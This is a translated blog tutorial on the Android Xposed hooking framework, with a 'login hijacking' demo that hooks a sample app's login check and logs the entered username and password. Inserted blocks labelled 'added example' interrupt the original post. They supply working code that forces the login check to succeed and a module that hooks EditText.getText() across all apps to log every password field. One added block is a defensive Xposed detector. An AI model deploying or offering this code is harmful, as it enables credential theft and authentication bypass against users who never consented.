If you want to fly high, you should forget the horizon.
A while ago I wrote an article about ad injection with CydiaSubstrate (address: http://blog.csdn.net/yzzst/article/details/47318751), and everyone enjoyed it. Readers who really understand this area, however, will know that there is a tool even more famous than CydiaSubstrate: Xposed.
Not because Xposed does so much better than CydiaSubstrate, but because Xposed is completely open source. Today we give a brief introduction to Xposed and write a simple login-hijacking demo so that everyone can get started with Xposed quickly.
Xposed
The Xposed framework is a framework service that can change how programs run (modify the system) without modifying any APK. It takes over the zygote process by replacing /system/bin/app_process with its own version, so that app_process loads XposedBridge.jar during startup. Since every app process is forked from zygote, this hijacks zygote and every Dalvik virtual machine it creates.
Many powerful modules can be built on the Xposed framework, and they can run at the same time without their functions conflicting.
In addition, each module for the Xposed framework can be downloaded separately. Applications and features such as Per App Setting (setting an individual DPI or modifying permissions per app), Cydia, XPrivacy (preventing privacy leaks), BootManager (managing apps that start at boot) and icon replacement for the native launcher are all built on this framework.
Official address: http://repo.xposed.info/.
Source code: https://github.com/rovo89.
The Xposed framework consists of an Android application, XposedInstaller, that acts as a local service, plus a jar file that provides the API.
So there are several steps we need to complete to install the Xposed framework:
Install the local service XposedInstaller
To install the XposedInstaller.apk local-service application, find, download and install it from the Framework section of its website. The address is:
http://repo.xposed.info/module/de.robv.android.xposed.installer
After installing the XposedInstaller application, you will see a screen asking you to activate the framework, as shown in Figure 8-5. Here we click "Install/Update" to activate the framework. On devices that do not support writing to /system directly, choose "Installation Method" and switch to installing automatically in recovery mode.
Because the installation requires root privileges and replaces app_process with the Xposed version, the device will reboot several times during installation.
TIPS: Some domestic (Chinese) ROMs are not compatible with Xposed. If installing Xposed fails, forcing the write from recovery may leave the device rebooting repeatedly (a boot loop) and unable to start normally.
Download the API library
Its API library is XposedBridgeApi-<version>.jar (the number is the Xposed API version; here we use XposedBridgeApi-54.jar). It can be found in Xposed's official support thread on the XDA forum, at:
http://forum.xda-developers.com/xposed/xposed-api-changelog-developer-news-t2714067
After downloading, copy the Xposed library into a lib directory (note: lib, not the libs directory that Android provides) and then add the jar to the build path.
If you place the jar directly under the libs directory, you will very likely get the error "IllegalAccessError: Class ref in pre-verified class resolved to unexpected implementation".
The reason is that XposedBridge.jar is already loaded into every app process by the framework itself. If the module APK also packages its own copy of the API classes, the same classes exist twice in the process and the Dalvik verifier rejects the duplicate. Keeping the jar in lib makes it a compile-time reference only, so the classes are resolved from the framework's copy at runtime.
Hands-on: login hijacking (principle)
Earlier, when I showed everyone ad injection with CydiaSubstrate (address: http://blog.csdn.net/yzzst/article/details/47318751), many netizens asked me: can it only inject an advertisement? What else can it do?
Login hijacking! You heard right. Today we give a simple demonstration of how to hijack an application's login function and print out the account and password.
Login hijacking as we commonly see it is carried out with hook technology. So how is login hijacking done? Let's look at some login examples we have all seen in development. First, let's see what a typical login screen looks like.
The corresponding login-flow code is as follows:
// onClick handler of the login button
mLoginButton.setOnClickListener(new OnClickListener() {
    @Override
    public void onClick(View v) {
        // read the user name from its EditText
        String username = mUserEditText.getText() + "";
        // read the password from its EditText
        String password = mPasswordEditText.getText() + "";
        if (isCorrectInfo(username, password)) {
            Toast.makeText(MainActivity.this, "Login successful!", Toast.LENGTH_LONG).show();
        } else {
            Toast.makeText(MainActivity.this, "Login failed!", Toast.LENGTH_LONG).show();
        }
    }
});
We can see that the user's input on the login screen is held in EditText controls; when the user clicks the "Login" button, that input is sent to the server to verify whether the account and password are correct. This makes things very simple: an attacker only needs to find the method in which the developer passes the EditText getText() values on to the network authentication, hook that method, and the user's account and password are captured.
TIPS: Of course, following the earlier CydiaSubstrate ad-injection example (address: http://blog.csdn.net/yzzst/article/details/47318751), we could also build an identical-looking Activity and hijack the original one so that ours pops up first, tricking the user into typing the password into it.
The specific process is as follows:
Hands-on: login hijacking (code)
Having understood the principle, we now put it into practice, here using the Xposed framework. Hooking with Xposed mainly relies on two important methods: handleLoadPackage, the callback invoked when a package is loaded, which gives us the package's ClassLoader; and findAndHookMethod, which hooks a method of the specified class. Their definitions are as follows:
/**
 * Callback invoked when a package is loaded
 */
public void handleLoadPackage(final LoadPackageParam lpparam)

/**
 * Hook method provided by Xposed (in XposedHelpers)
 *
 * @param className                 class to hook
 * @param classLoader               ClassLoader that can load that class (usually lpparam.classLoader)
 * @param methodName                method to hook
 * @param parameterTypesAndCallback the method's parameter types, followed by the hook callback
 * @return an XC_MethodHook.Unhook handle that can later remove the hook
 */
public static XC_MethodHook.Unhook findAndHookMethod(String className, ClassLoader classLoader,
        String methodName, Object... parameterTypesAndCallback)
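The definition above says what the two methods take but not what a hook callback can actually do with the method it intercepts. The module below is an added example, not code from the original post, that hooks the same com.example.login.MainActivity.isCorrectInfo(String, String) target used later in the article and shows the three things a practitioner relies on: the argument array is live and writable in beforeHookedMethod, the return value can be read and overridden in afterHookedMethod (here forcing the check to succeed, i.e. an authentication bypass rather than just credential capture), and XC_MethodReplacement skips the original body entirely. The class name HookSemanticsDemo and the REPLACE_METHOD_ENTIRELY switch are my own; the Xposed APIs used are the real ones from XposedBridgeApi.

```java
import de.robv.android.xposed.IXposedHookLoadPackage;
import de.robv.android.xposed.XC_MethodHook;
import de.robv.android.xposed.XC_MethodReplacement;
import de.robv.android.xposed.XposedBridge;
import de.robv.android.xposed.XposedHelpers;
import de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam;

// Added example module (assumed name); targets the demo app from this article.
public class HookSemanticsDemo implements IXposedHookLoadPackage {

    // Choose between the two callback styles Xposed offers for the same target method.
    private static final boolean REPLACE_METHOD_ENTIRELY = false;

    @Override
    public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable {
        // lpparam describes the package being loaded; only act on the demo login app.
        if (!"com.example.login".equals(lpparam.packageName)) return;

        if (REPLACE_METHOD_ENTIRELY) {
            // XC_MethodReplacement: the original isCorrectInfo body never runs and
            // every caller receives the constant, an unconditional login bypass.
            XposedHelpers.findAndHookMethod(
                    "com.example.login.MainActivity", lpparam.classLoader,
                    "isCorrectInfo", String.class, String.class,
                    XC_MethodReplacement.returnConstant(Boolean.TRUE));
            return;
        }

        // XC_MethodHook: the original method still runs, between the two callbacks.
        final XC_MethodHook.Unhook unhook = XposedHelpers.findAndHookMethod(
                "com.example.login.MainActivity", lpparam.classLoader,
                "isCorrectInfo", String.class, String.class,
                new XC_MethodHook() {
                    @Override
                    protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
                        // param.args is the live argument array: writing to it changes what
                        // the original method receives (here a trimmed user name).
                        String username = (String) param.args[0];
                        if (username != null) param.args[0] = username.trim();
                    }

                    @Override
                    protected void afterHookedMethod(MethodHookParam param) throws Throwable {
                        // If the original threw, there is no result to override; leave the
                        // exception in place so the app sees its normal failure path.
                        if (param.hasThrowable()) return;
                        // getResult() is the (boxed) value the original returned;
                        // setResult() replaces what the caller will see.
                        boolean verdict = Boolean.TRUE.equals(param.getResult());
                        XposedBridge.log("isCorrectInfo(" + param.args[0] + ") returned "
                                + verdict + "; forcing true");
                        param.setResult(Boolean.TRUE);
                    }
                });

        // The handle returned by findAndHookMethod removes the hook again when needed.
        XposedBridge.log("isCorrectInfo hook installed: " + (unhook != null));
    }
}
```

The difference between the two styles matters in practice: with XC_MethodHook the server round-trip or local check inside isCorrectInfo still happens (and its side effects, such as failed-login counters, still fire), whereas XC_MethodReplacement suppresses it completely. Either way, an app that decides "logged in" from a boolean computed in its own process has nothing the hook cannot rewrite; the decision has to be made server-side.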
Using Xposed to hook is divided into the following steps:
1. Declare the module name and API version in the AndroidManifest.xml file
<application
    android:allowBackup="true"
    android:icon="@drawable/ic_launcher"
    android:label="@string/app_name"
    android:theme="@style/AppTheme" >
    <!-- marks this APK as an Xposed module -->
    <meta-data android:name="xposedmodule" android:value="true" />
    <!-- module description shown in XposedInstaller -->
    <meta-data android:name="xposeddescription" android:value="An example of login hijacking" />
    <!-- minimum Xposed API version; 54 matches the XposedBridgeApi-54.jar used above -->
    <meta-data android:name="xposedminversion" android:value="54" />
</application>
2. Create an entry class that implements the IXposedHookLoadPackage interface
In the following, we create a new class com.example.loginhook.Main and implement the handleLoadPackage method of the IXposedHookLoadPackage interface, filtering out every application whose package name is not com.example.login; that is, we only act on the application with package name com.example.login. As shown below:
import de.robv.android.xposed.IXposedHookLoadPackage;
import de.robv.android.xposed.XposedBridge;
import de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam;

public class Main implements IXposedHookLoadPackage {
    /**
     * Callback invoked when a package is loaded
     */
    public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable {
        // ignore every application except the one with package name com.example.login
        if (!lpparam.packageName.equals("com.example.login"))
            return;
        XposedBridge.log("Loaded app: " + lpparam.packageName);
    }
}
3. Declare the entry class
Create a file named xposed_init in the assets folder and declare the main entry class in it (one fully qualified class name per line). Here our entry class is com.example.loginhook.Main.
4. Use findAndHookMethod to hook and hijack the login information
This is the most important step, the one in which the work we analyzed earlier is actually done. From our analysis of the login flow, what we need to hook is the isCorrectInfo method of com.example.login.MainActivity. We use the findAndHookMethod provided by Xposed to perform the method hook directly (similar to Cydia), and in the hook callback we use XposedBridge.log to write the login credentials to the Xposed log. The code is as follows:
import static de.robv.android.xposed.XposedHelpers.findAndHookMethod;

import de.robv.android.xposed.IXposedHookLoadPackage;
import de.robv.android.xposed.XC_MethodHook;
import de.robv.android.xposed.XposedBridge;
import de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam;

public class Main implements IXposedHookLoadPackage {
    /**
     * Callback invoked when a package is loaded
     */
    public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable {
        // ignore every application whose package name is not com.example.login
        if (!lpparam.packageName.equals("com.example.login"))
            return;
        XposedBridge.log("Loaded app: " + lpparam.packageName);
        // hook isCorrectInfo(String, String) in MainActivity
        findAndHookMethod("com.example.login.MainActivity", lpparam.classLoader,
                "isCorrectInfo", String.class, String.class,
                new XC_MethodHook() {
                    @Override
                    protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
                        // runs before the original method: the arguments are the credentials
                        XposedBridge.log("Hijacking starts.");
                        XposedBridge.log("Parameter 1 = " + param.args[0]);
                        XposedBridge.log("Parameter 2 = " + param.args[1]);
                    }

                    @Override
                    protected void afterHookedMethod(MethodHookParam param) throws Throwable {
                        // runs after the original method has returned
                        XposedBridge.log("Hijacking ends.");
                        XposedBridge.log("Parameter 1 = " + param.args[0]);
                        XposedBridge.log("Parameter 2 = " + param.args[1]);
                    }
                });
    }
}
5. Enable our custom module in XposedInstaller
The module does not take effect immediately after being compiled and installed on the Android device; we need to tick it in the Modules section of XposedInstaller before it becomes active. As shown in the figure.
6. Restart and verify
Restart the Android device and open the Logs section of XposedInstaller. Because we used XposedBridge.log to write our output, it appears here, and we find the account and password we set out to hijack displayed in the log.
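The verification step above is the attacker's view. From the target app's side, the same mechanics leave traces a defender can look for: XposedBridge.jar is injected into every process, its classes resolve from any app, and the main thread's root frame and every hooked call pass through de.robv.android.xposed classes. The helper below is an added example, not part of the original post or of Xposed, showing those checks; XposedDetector and its method names are my own. It uses only standard Java APIs.

```java
import java.io.File;

/**
 * Heuristic Xposed presence checks an app can run before trusting its own
 * in-process decisions (such as the isCorrectInfo() verdict hooked in this article).
 * Added example; each check is a signal, not proof.
 */
public final class XposedDetector {

    private XposedDetector() {}

    /** XposedBridge.jar is loaded into every app process, so its classes resolve from any app. */
    public static boolean bridgeClassPresent() {
        try {
            Class.forName("de.robv.android.xposed.XposedBridge");
            return true;
        } catch (ClassNotFoundException e) {
            return false;
        }
    }

    /**
     * With Xposed installed, app_process enters Java through XposedBridge.main, so the
     * main thread's root frame is an Xposed class, and every hooked call is dispatched
     * through XposedBridge as well; either way de.robv.android.xposed.* shows up.
     */
    public static boolean xposedFramesPresent(StackTraceElement[] stack) {
        for (StackTraceElement frame : stack) {
            if (frame.getClassName().startsWith("de.robv.android.xposed.")) {
                return true;
            }
        }
        return false;
    }

    /** The installer places the bridge jar in /system/framework on every Xposed device. */
    public static boolean bridgeJarOnDisk() {
        return new File("/system/framework/XposedBridge.jar").exists();
    }

    /** Combine the signals; any one of them is enough to treat the process as hookable. */
    public static boolean likelyHooked() {
        return bridgeClassPresent()
                || bridgeJarOnDisk()
                || xposedFramesPresent(Thread.currentThread().getStackTrace());
    }
}
```

Treat a positive result as a reason to refuse to make security decisions locally, not as tamper-proofing: a module can hook Class.forName, File.exists and Thread.getStackTrace just as easily as isCorrectInfo, so these checks raise the cost for a casual hook but cannot stop a determined one. The durable fix is the one the article's own login flow lacks: the password must be verified by the server, and the client must act on the server's response rather than on a local boolean.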
TIPS: Here we completed the hook and hijack by reverse-analyzing the function that checks the credentials on the login page. Some readers may wonder: could we instead hook the getText() method of the EditText (input box) control that the system provides? That would let us monitor and hijack every input in the system. We leave this as a thought exercise; interested readers can try it.
Finally, I hope we can exchange ideas and learn from each other; you can add my personal contact details below.
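As a worked answer to the thought exercise above, here is an added example (not code from the original post) that hooks android.widget.EditText.getText() for every app at once. Because EditText is a framework class loaded by the boot ClassLoader, the hook is installed from IXposedHookZygoteInit.initZygote rather than per package, and every app forked from zygote inherits it. Two things the naive version gets wrong are handled: getText() is called on every keystroke and layout pass, so the hook deduplicates per field, and it only reports fields whose InputType marks them as passwords instead of flooding the log with every widget in the system. The class name PasswordFieldHook and the WeakHashMap bookkeeping are my own; the Xposed calls (findAndHookMethod on a Class, AndroidAppHelper.currentPackageName) are the real API.

```java
import android.text.InputType;
import android.widget.EditText;

import java.util.WeakHashMap;

import de.robv.android.xposed.AndroidAppHelper;
import de.robv.android.xposed.IXposedHookZygoteInit;
import de.robv.android.xposed.XC_MethodHook;
import de.robv.android.xposed.XposedBridge;
import de.robv.android.xposed.XposedHelpers;

// Added example module (assumed name): logs the contents of password fields system-wide.
public class PasswordFieldHook implements IXposedHookZygoteInit {

    // Last value logged per EditText instance. getText() fires on every keystroke and
    // layout pass; without this map the log drowns in repeats of the same value.
    // Weak keys let fields be garbage-collected when their Activity goes away.
    private static final WeakHashMap<EditText, String> lastSeen = new WeakHashMap<EditText, String>();

    @Override
    public void initZygote(StartupParam startupParam) throws Throwable {
        // Hooking here, before any app is forked, covers every process on the device.
        // EditText overrides getText() (returning Editable), so the Class overload finds it.
        XposedHelpers.findAndHookMethod(EditText.class, "getText", new XC_MethodHook() {
            @Override
            protected void afterHookedMethod(MethodHookParam param) throws Throwable {
                EditText field = (EditText) param.thisObject;
                if (!isPasswordField(field.getInputType())) return;

                // Use the hooked call's own result; calling field.getText() here would
                // re-enter this hook recursively.
                Object result = param.getResult();
                String value = result == null ? "" : result.toString();
                if (value.isEmpty()) return;

                synchronized (lastSeen) {
                    if (value.equals(lastSeen.get(field))) return;
                    lastSeen.put(field, value);
                }
                XposedBridge.log(AndroidAppHelper.currentPackageName()
                        + " password field: " + value);
            }
        });
    }

    /** True for the text and number input variations Android uses for password entry. */
    static boolean isPasswordField(int inputType) {
        int cls = inputType & InputType.TYPE_MASK_CLASS;
        int variation = inputType & InputType.TYPE_MASK_VARIATION;
        if (cls == InputType.TYPE_CLASS_TEXT) {
            return variation == InputType.TYPE_TEXT_VARIATION_PASSWORD
                    || variation == InputType.TYPE_TEXT_VARIATION_WEB_PASSWORD
                    || variation == InputType.TYPE_TEXT_VARIATION_VISIBLE_PASSWORD;
        }
        return cls == InputType.TYPE_CLASS_NUMBER
                && variation == InputType.TYPE_NUMBER_VARIATION_PASSWORD;
    }
}
```

The module still needs the manifest metadata and the assets/xposed_init entry from the steps above, with this class name listed instead of (or in addition to) com.example.loginhook.Main. Note the limitation that the thought exercise hides: an app that reads input through a custom TextView subclass, a WebView form, or its own TextWatcher never calls EditText.getText() at the moment that matters, so a system-wide getText() hook is broad but not complete.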
/*
 * @author Zhou Shengtao (Zhou San)
 * @since August 14, 2015 12:17:22
 * @weixin stchou_zst
 * @blog http://blog.csdn.net/yzzst
 * @ Exchange and learning QQ group: 341989536
 * @ Private QQ: 445914891
 */
Copyright notice: when reprinting, please credit http://blog.csdn.net/yzzst. This article is the blogger's original work and may not be reproduced without the blogger's permission.
Android hook powerhouse: Xposed primer (login-hijacking demo)